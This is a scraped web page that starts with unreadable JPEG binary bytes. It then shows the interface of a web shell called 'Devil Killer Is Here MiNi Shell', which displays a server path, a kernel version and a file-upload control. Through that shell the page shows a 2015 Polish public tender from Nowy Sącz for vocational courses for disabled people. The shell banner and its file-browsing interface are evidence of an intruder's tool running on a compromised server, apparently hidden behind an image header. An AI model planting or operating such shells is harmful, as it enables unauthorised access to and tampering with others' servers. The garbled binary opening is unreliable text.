JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150127/11069-N-2015.html

<p class="kh_header"><b>Nowy Sącz: Usługa w zakresie: Organizacja i przeprowadzenie kursów edukacyjnych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 11069 - 2015; data zamieszczenia: 27.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ns</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie: Organizacja i przeprowadzenie kursów edukacyjnych dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zad. 1. Kurs  florystyczny dla osób niepełnosprawnych.
1.	Liczba osób: 2. 
2.	Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w zajęciach.
3.	Program zajęć ma obejmować: 40 godzin (1godzina = 45min.). 
4.	Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05 2015 r.
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.2. Kurs języka niemieckiego dla osób niepełnosprawnych.
1.	Liczba osób: 2. 
2.	Stopień niepełnosprawności: różny stopień niepełnosprawności od lekkiego do znacznego  umożliwiający samodzielny udział w zajęciach .
3.Program zajęć ma obejmować: 50 godzin (1godzina = 45min.).
4. Miejsce realizacji: Nowy Sącz.
5.Termin realizacji: do 31.05.2015 r.
6.Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 3. Kurs języka  angielskiego dla osób niepełnosprawnych.
1.	Liczba osób: 7. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w zajęciach (dwie osoby mające problemy z poruszaniem się w ich przypadku podczas zajęć potrzebny jest opiekun.
3.Program zajęć ma obejmować: 50 godzin (1godzina = 45min.)
4.	Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05.2015 r. 
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.4.Kurs wizażu dla osób niepełnosprawnych.
1.	Liczba osób: 2. 
2.	Stopień niepełnosprawności: różny stopień niepełnosprawności od lekkiego do znacznego umożliwiający samodzielny udział w szkoleniu.
3.	Program zajęć ma obejmować: 40 godzin (1godzina = 45min.).
4.Miejsce realizacji: Nowy Sącz.
5.Termin realizacji: do 31.05. 2015 r.
6.Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.5. Kurs krawiecki dla osób niepełnosprawnych.
1.	Liczba osób: 1. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności umożliwiający samodzielny udział 
szkoleniu.
3.	Program zajęć ma obejmować: 50 godzin (1godzina = 45min.)
4.Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05 2015 r.
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.6.Kurs grafiki komputerowej  dla osób niepełnosprawnych.
1.	Liczba osób: 1. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności umożliwiający samodzielny udział 
w szkoleniu.
3.	Program zajęć ma obejmować: 50 godzin (1godzina = 45min.).
4.	Miejsce realizacji: Nowy Sącz.
5.  Termin realizacji: do 31.05.2015 r.
6.Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.7. Kurs komputerowy - poziom podstawowy dla osób niepełnosprawnych.
1.	Liczba osób: 14. (Grupa I - 7 osób; Grupa II - 7 osób) 
2.	Stopień niepełnosprawności: stopień niepełnosprawności: od lekkiego do znacznego; 
Grupa I - różne rodzaje niepełnosprawności od lekkiego do znacznego, umożliwiające samodzielny udział w zajęciach; 
Grupa II - różne rodzaje niepełnosprawności od lekkiego do znacznego potrzebny jest  1 opiekun zarówno na trasie jak i podczas trwania zajęć. 
UWAGA! Grupy mogą być większe lub mniejsze, nie więcej niż o 2 osoby.
3.	Program zajęć ma obejmować: 40 godzin (1godzina = 45min.).
4.Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05.2015 r.
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad.8. Kurs komputerowy - zaawansowany dla osób niepełnosprawnych.
1.	Liczba osób: 1. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności umożliwiający samodzielny udział 
w szkoleniu.
3.	Program zajęć ma obejmować: 50 godzin (1godzina = 45min.).
4.	Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05.2015 r.
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 9.Kurs kulinarny dla osób niepełnosprawnych. 
1.	Liczba osób: 1. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności znaczny; osoba mająca problem z poruszaniem się, w jej przypadku potrzebny jest opiekun podczas trwania zajęć.
3.	Program zajęć ma obejmować: 40 godzin (1godzina = 45min.).
4.Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05.2015 r.
6.	Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 10. Kurs księgowości komputerowej dla osób niepełnosprawnych.
1.	Liczba osób: 1. 
2.	Stopień niepełnosprawności: stopień niepełnosprawności umożliwiający samodzielny udział w zajęciach.
3.	Program zajęć ma obejmować: 50 godzin (1godzina = 45min.).
4.	Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31.05.2015 r.
6.	Zakres merytoryczny zadania m.in.:
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 11. Kurs nowoczesny sprzedawca wraz z obsługą kasy fiskalnej, terminali płatniczych, komputera oraz z fakturowaniem komputerowym dla osób niepełnosprawnych. 
1.	Liczba osób: 4. 
2.	Stopień niepełnosprawności: od lekkiego do umiarkowanego; stopień niepełnosprawności umożliwiający samodzielny udział w szkoleniu.
3.	Program zajęć ma obejmować: 50 godzin (1godzina = 45min.).
5.	Miejsce realizacji: Nowy Sącz.
6.	Termin realizacji: do 31.05.2015 r.
7.	Zakres merytoryczny zadania m.in.:
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 12. Kurs administracyjno - biurowy dla osób niepełnosprawnych.
	1. Liczba osób: 2. 
	2. Stopień niepełnosprawności: stopień niepełnosprawności od lekkiego do znacznego,  umożliwiający samodzielny udział w szkoleniu.
	3. Program zajęć ma obejmować: 50 godzin (1godzina = 45min.). 
	4. Miejsce realizacji: Nowy Sącz.
5.	Termin realizacji: do 31. 05.2015 r.
6.	Zakres merytoryczny zadania m.in.:
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
Zad. 13: Kurs opiekuna osób starszych i niepełnosprawnych dla osób niepełnosprawnych.
1.Liczba osób: 1. 
2. Stopień niepełnosprawności: stopień niepełnosprawności umożliwiający samodzielny udział w szkoleniu.
3.Program zajęć ma obejmować: 40 godzin (1godzina = 45min.)
4.Miejsce realizacji: Nowy Sącz.
5.Termin realizacji: do 31.05. 2015 r.
6.Zakres merytoryczny zadania m.in. :
Poszerzony zakres realizacji usługi w SIWZ (z uwagi na ograniczoną ilość znaków w BZP)
WYMOGI OGÓLNE DO WSZYSTKICH KURSÓW:
1.	Szkolenie ma zakończyć się badaniem ewaluacyjnym, przeprowadzonym w formie pisemnej, sprawdzającym nabycie, utrwalenie wiedzy i umiejętności praktycznych oraz podniesieniem kwalifikacji zawodowych uczestników kursu.
2.	Wykonawca zobowiązany jest do przeprowadzenia wewnętrznego egzaminu sprawdzającego, przygotowania i przekazania kopii (potwierdzonej za zgodność z oryginałem) protokołu z egzaminu wewnętrznego Zamawiającemu.  
3.	Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą e- learning. 
4.	Miejsce realizacji zamówienia: zaleca się, aby zajęcia teoretyczne i praktyczne odbywały się na terenie miasta Nowy Sącz. Dzienny wymiar godzinowy zajęć nie może przekroczyć 5 godzin dydaktycznych, z zastrzeżeniem, że w trakcie realizacji zajęć dłuższych niż 2 godziny dydaktyczne Wykonawca zapewni po każdych 2 godzinach przerwę 15 minutową. 
5.	Wykonawca zapewni salę szkoleniową przystosowaną do potrzeb osób niepełnosprawnych ( wejście do budynku powinno być dostosowane do potrzeb osób niepełnosprawnych: wjazd dla wózków, winda; do wielkości grup - wyposażona w krzesła i stoliki z możliwością dowolnej aranżacji ich ustawienia, przystosowana do prowadzenia zajęć dydaktycznych; sala powinna być wyposażona w projektor multimedialny, ekran, flipchart (ewentualnie tablica sucho ścierna); sala szkoleniowa musi posiadać okna z dostatecznym naświetleniem naturalnym, posiadać oświetlenie sztuczne, spełniać wymogi bezpieczeństwa i higieny pracy oraz akustyczne, być ogrzewana, posiadać zaplecze sanitarne (toalety dostosowane do potrzeb osób niepełnosprawnych); sala powinna być wentylowana (z dostępem do świeżego powietrza), sala powinna zapewniać możliwość organizacji przerw  kawowych.
6.	W przypadku realizacji zadań wykonawca  według ustaleń Zamawiającego dla poszczególnych zadań zapewni transport lub zwrot uczestnikom kosztów dojazdu (wg tabel) z miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie kursu i z powrotem (w wysokości odpowiadającej cenie biletu) na podstawie: przedłożonego biletu bądź pisemnego oświadczenia uczestnika 
o korzystaniu ze środków transportu publicznego wraz z informacją od przewoźnika dot. cen biletów na danej trasie. W przypadku dojazdu uczestników samochodem prywatnym za kwalifikowane można uznać wydatki do wysokości nie wyższej niż cena najtańszego biletu na danej trasie, po przedstawieniu przez uczestnika stosownego oświadczenia o wykorzystaniu danego samochodu osobowego 
na potrzeby dojazdów w ramach uczestnictwa w projekcie oraz informacji uzyskanej od przewoźnika dotyczącej cen biletów na danej trasie. Nie ma konieczności przedstawiania paragonów lub faktur 
za zakup paliwa.
7.	Wykonawca zobowiązany jest do organizacji i przeprowadzenia kursów w ramach w/w Projektu, których ilość została określona w SIWZ. Kursy są prowadzone w zakresach tematycznych, z których każdy stanowi odrębne zadanie, wg wymogów Zamawiającego oraz w orientacyjnych terminach (zakończenie kursów do 31 maja 2015 r.) określonych w SIWZ.
8.	Wykonawca zobowiązany jest załączyć do oferty wstępne: Programy merytoryczne kursów 
z uwzględnieniem czasu trwania sporządzone odrębnie dla każdego z kursu - do akceptacji Zamawiającego przed zawarciem umowy. Programy kursów muszą uwzględniać również realizację zajęć teoretycznych i praktycznych, a w szczególności zakres merytoryczny poszczególnych kursów opisany w SIWZ .
9.	Wykonawca zapewnienia wykwalifikowaną kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe i uprawnienia o ile przepisy prawa nakładają obowiązek ich posiadania. 
10.	W przypadku zadania 3 i 9 Wykonawca zapewni opiekuna dla osób niepełnosprawnych podczas trwania zajęć posiadającego doświadczenie w pracy z osobami niepełnosprawnymi, zaś w przypadku zadania 7 Wykonawca zapewni opiekuna dla osób niepełnosprawnych zarówno na czas przejazdu jak również na czas  trwania zajęć stacjonarnych, posiadającego doświadczenie w pracy z osobami niepełnosprawnymi.
11.	Wykonawca zobowiązany jest dostarczyć harmonogram kursów Zamawiającemu (do akceptacji
 i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
12.	Wykonawca zobowiązany jest zapewnić dla każdego uczestnika kursu ubezpieczenie NNW 
w trakcie jego trwania, a także w drodze na nie i z powrotem na kwotę minimalną 5.000,00 zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu przed rozpoczęciem kursów. 
12.Każdy uczestnik szkolenia musi mieć zapewnione materiały szkoleniowe zawierające logowanie oraz informacje o współfinansowaniu zgodnie z obowiązującymi wytycznymi Ministerstwa Infrastruktury 
i Rozwoju w zakresie Programu Operacyjnego Kapitał Ludzki 2007-2013, zamieszczonymi na stronie internetowej: www.efs.gov.pl zakładka - Zasady promocji, uzgodniony pomiędzy Zamawiającym 
a Wykonawcą przed rozpoczęciem szkolenia, w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne (np. kserokopie treści przekazywanych w trakcie zajęć, prezentacji multimedialnych), teczka-aktówka na materiały szkoleniowe, wielkość A-4. Materiały szkoleniowe należy rozdać uczestnikom szkolenia w pierwszym dniu szkolenia i przechodzą one na własność uczestników po zakończeniu szkolenia, potwierdzenie ich odbioru Wykonawca jest zobowiązany przekazać Zamawiającemu 
wraz z dokumentacją ze szkolenia. 
13.Wykonawca zobowiązany jest do przekazania uczestnikom zajęć informacji na temat współfinansowania przedmiotowych zajęć przez Unię Europejską ze środków Europejskiego Funduszu Społecznego i przekazać Zamawiającemu jedno pisemne oświadczenie w tej sprawie potwierdzającego wykonanie ww wymagania.
14. Wykonawca wyda zaświadczenia ukończeniu kursu zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993 r. w sprawie Rehabilitacji zawodowej i społecznej oraz zatrudniania osób niepełnosprawnych. (Dz.U.2011.127.721) oraz rozporządzeniem MEN z dnia 11.01.2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186).
14.Wykonawca zobowiązany jest do prowadzenia dokumentacji odrębnie dla każdego kursu (w tym również fotograficznej):listę obecności, potwierdzenie transportu na zajęcia, dziennik zajęć zawierający listę obecności oraz wymiar godzin i tematy zajęć; lista osób, które rozpoczęły kurs; lista osób, które ukończyły kursu; lista osób, które nie ukończyły kursu; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w kursie; potwierdzenie zwrotu kosztów dojazdu; potwierdzenie odbioru materiałów szkoleniowych; potwierdzenie korzystania z usługi cateringowej; protokół z wewnętrznego egzaminu sprawdzającego, ankiety ewaluacyjne i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej oraz wykonawcy. Wykonawca zobowiązany jest przedłożyć ww. dokumenty do akceptacji Zamawiającemu 8 dni przed rozpoczęciem zajęć. 
15.Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących w kursach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
16. Wykonawca przekaże Zamawiającemu oryginały całości dokumentacji szkolenia w terminie 7 dni od jego zakończenia. Dokumentacja szkolenia powinna być oznakowana zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, zamieszczonymi na stronie internetowej: www.efs.gov.pl, zakładka- Zasady promocji.
17.Wykonawca zobowiązany jest do przeprowadzenia kursu także w przypadku innej 
od wymienionej w SIWZ liczby osób. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo zmiany liczby uczestników poszczególnych kursów. Zamawiający zapłaci Wykonawcy za faktyczną liczbę osób, które uczestniczyły w kursie na podstawie przekazanej imiennej listy uczestników.
18.Zastosowane metody nauczania muszą uwzględniać indywidualne podejście do każdego uczestnika. 
19.Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników zajęć, a także bieżącego informowania Zamawiającego o każdej nieobecności osoby, która planowo powinna uczestniczyć w zajęciach.
20.Wykonawca wyznacza osobę do kontaktu (koordynator) - sprawującą nadzór nad realizacją przedmiotu zamówienia, odpowiedzialną za organizację zajęć, informowanie uczestników
o planowanych zajęciach, ściśle współpracuje z pracownikami Zamawiającego.
21.Wykonawca zobowiązany będzie do oznakowanie miejsca kursu oraz wszelkich dokumentów związanych z organizacją zajęć zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie www.efs.gov.pl, zakładka Zasady promocji) umieszczania na materiałach szkoleniowych informacji projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz logotypu Programu Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny. 
22.Wykonawca zobowiązany jest w ramach projektu (w okresie realizacji zawartej umowy) do zarejestrowania się w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.inwestycjawkadry.pl i aktualizowania w tej bazie informacji o każdym prowadzonym szkoleniu w ramach nin. projektu (zawartej umowy) nie rzadziej niż raz w miesiącu oraz zobowiązany jest do przedkładania powyższych informacji Zamawiającemu z wykonania powyższego nałożonego obowiązku.
23.Wykonawca zobowiązany jest w ramach projektu (w okresie realizacji zawartej umowy) 
do zarejestrowania informacji o szkoleniu i terminach zajęć w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.pociagdokariery.pl  i aktualizowania w tej bazie informacji
 o prowadzonym szkoleniu organizowanym w ramach nin. projektu (zawartej umowy) nie rzadziej niż raz w miesiącu oraz zobowiązany jest do przedkładania powyższych informacji Zamawiającemu 
z wykonania powyższego nałożonego obowiązku.
24.Wykonawca umożliwić pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji kursów oraz poddać się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzielać stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jej żądanie.
25.Wykonawca zobowiązany jest zorganizować i przeprowadzić po zakończeniu każdego z kursów egzamin sprawdzający stopień opanowania materiału będącego przedmiotem poszczególnych kursów.
26.Po zakończeniu poszczególnych kursów Wykonawca zobowiązany jest wystawić dla każdego uczestnika: zaświadczenie o jego ukończeniu oraz certyfikat, których wzór i ologowanie zostanie ustalone z Zamawiającym po podpisaniu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W postępowaniu mogą wziąć udział Wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień, a w szczególności powinni posiadać wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy, właściwy ze względu na siedzibę instytucji szkoleniowej. Na potwierdzenie spełnienia warunku Wykonawca składa oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej , jednej usługi wskazanej dla zakresu - przedmiotu; ( łącznie jedna umowa lub odrębnie kilka umów) dla każdego zadania, przeprowadzonych w ramach realizacji projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencje poświadczenie, zaświadczenie itp. - dokumenty zgodne z regulacją rozporządzenia R.M. z dnia 19 luty 2013 r. w sprawie rodzajów dokumentów.(Dz. U. 2013r. poz.231), że te usługi były wykonane lub są wykonywane należycie.  tj. dokumenty potwierdzające, że zamówienia wskazane w wykazie, o którym mowa w pkt 2., zostały wykonane należycie ).
Jeżeli w celu wykazania spełniania warunku w zakresie wiedzy i doświadczenia zamierza polegać na wiedzy i doświadczeniu innych podmiotów wówczas zobowiązany jest on zaangażować te podmioty do realizacji zamówienia odpowiednio do zakresu wykazanej wiedzy i doświadczenia tego podmiotu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba,osoby prowadzące (wskazane w ofercie) posiadają  przygotowanie pedagogiczne, wykształcenie, kwalifikacje i umiejętności związane z przedmiotem zamówienia) - warunkiem koniecznym dla wykazania, potwierdzenia tego warunku - jest dołączenie dla osób wskazanych dla realizacji zadań ich C.V. zawodowego oraz kopii dyplomów i uprawnień zawodowych odpowiednich dla zakresu szkolenia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu, dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust.1 ustawy Pzp .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
